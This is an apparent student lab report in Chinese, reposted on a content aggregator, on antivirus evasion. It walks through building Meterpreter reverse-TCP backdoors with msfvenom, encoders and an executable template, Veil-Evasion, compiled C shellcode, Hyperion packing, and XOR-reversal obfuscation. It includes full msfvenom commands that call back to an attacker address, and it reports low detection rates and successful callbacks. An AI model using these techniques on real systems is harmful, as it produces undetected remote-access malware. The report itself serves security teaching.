20155301實驗三 免殺原理與實踐

實驗內容

1 正確使用msf編碼器，msfvenom生成如jar之類的其他文件，veil-evasion，自己利用shellcode編程等免殺工具或技巧；

2 通過組合應用各種技術實現惡意代碼免殺

3 用另一電腦實測，在殺軟開啟的情況下，可運行并回連成功，注明電腦的殺軟名稱與版本

基礎問題回答

1.殺軟是如何檢測出惡意代碼的？

答： 對惡意代碼的文件屬性、編程語言、字符串特征、輸入函數、系統和網絡的行為特征進行了分析,然后,通過挖掘Windows系統各種與進程相關的數據結構進行檢測。

2.免殺是做什么？

答： 免殺將木馬或病毒進行隱藏，偽裝成正常軟件，防止被殺毒軟件發現并刪除的技術。

3.免殺的基本方法有哪些？

答： 1. 二進制的免殺（無源碼），只能通過通過修改asm代碼／二進制數據／其他數據來完成免殺。

有源碼的免殺，可以通過修改源代碼來完成免殺，也可以結合二進制免殺的技術。

實踐總結與體會

此次實驗是在上次的基礎上進行的，比上一次的實驗所用的后門，此次嘗試修改的后門更加隱蔽，可以不被及部分的殺毒軟件查殺，此次學習的免殺的技術也讓我認識到了網絡中的不安全性，更讓我對于殺毒軟件的殺毒技術有些好奇，為什么這么簡單就能產生的后門軟件卻能避過市面上流行的大部分殺毒軟件，希望在之后的學習中能多學習一些殺毒技術來保障我們的信息安全。

離實戰還缺些什么技術或步驟

免殺的技術還是有些單一，所完成的免殺的后門雖然不會被大部分殺毒軟件發現，但是還有有可以發現免殺的后門程序的殺毒軟件，我認為還缺少更加復雜的技術或者尋找一個利用各種免殺技術配合產生后門的方法，來進一步提高免殺率。

實驗過程

1.測試上次實驗產生的后門能不能被殺毒軟件查殺出來。

選擇的測試網站是Virscan,在對上次后門重命名之后，進行測試，有近一半的殺毒軟件可以檢測出來。

2.使用msf編碼器，msfvenom生成如jar之類的其他文件。

2.1 Msfvenom是Metasploit平臺下用來編碼payloads免殺的工具，msfvenom命令行選項如下

-p,指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload，請使用'-'或者stdin指定。 -f,指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表) -e,指定需要使用的encoder（編碼器） -a,指定payload的目標架構，指定payload的目標平臺 -b,設定規避字符集，比如: '\x00\xff' -i,指定payload的編碼次數 -x,指定一個自定義的可執行文件作為模板

2.2 利用計算器程序作為可執行文件的模板生成payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.229.134 LPORT=5301 -x calc.exe -f exe > met-encoded.exe

測試結果如下：

3.veil-evasion，自己利用shellcode編程等免殺工具或技巧。

3.1 安裝veil-evasion

Veil-Evasion是一個免殺平臺，與Metasploit有點類似，在Kalil軟件庫中有，但默認沒裝，需要我們自己安裝，但是在安裝過程中總會出現缺失幾個軟件包導致無法成功安裝的問題，在反復嘗試之后，選擇了老師的虛擬機作為實驗環境。

3.2 安裝成功后，在Kali的終端輸入veil進入Veil，之后輸入list

3.3 輸入use，選擇Evasion

3.4 輸入list payloads之后選擇自己想要的語言，我第一次嘗試的是比較熟悉的c語言，所以輸入use 8

3.5 設置IP和端口，然后generate

3.6 出現下圖所示，其中記下生成的文件存儲的路徑

3.7 放到網站上掃描下，然后開始回連，回連成功

4.C語言調用Shellcode

4.1 利用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.134 LPORT=5301 -f c生成一個c語言格式的Shellcode數組

4.2 利用i686-w64-mingw32-g++ met.c -o met.exe在Linux平臺交叉編譯Windows應用

4.3 復制到windows平臺下，發現打不開

4.4 用VS編譯生成了一個exe，測試回連

5.通過組合應用各種技術實現惡意代碼免殺

5.1 找到veil-evasion下hyperion文件夾，進行操作

5.2 輸入命令wine hyperion.exe -v 5301.exe 5301upx.exe

5.3 放到網站測試

6.修改代碼提高免殺率

6.1 嘗試對原shellcode異或0x01,異或之后再對字符串數組進行倒置操作，然后在代碼中需要先進行倒置，即恢復原本異或01后的字符串數組，再異或01，可以返回原本的shellcode，希望通過修改shellcode原本的樣子，降低其通過特征庫查殺的概率，可以和殺軟共存實現免殺，放到virscan上也只有2%的報毒率。

轉載于:https://www.cnblogs.com/fengxingck/p/8778529.html

總結

以上是生活随笔為你收集整理的20155301实验三 免杀原理与实践的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。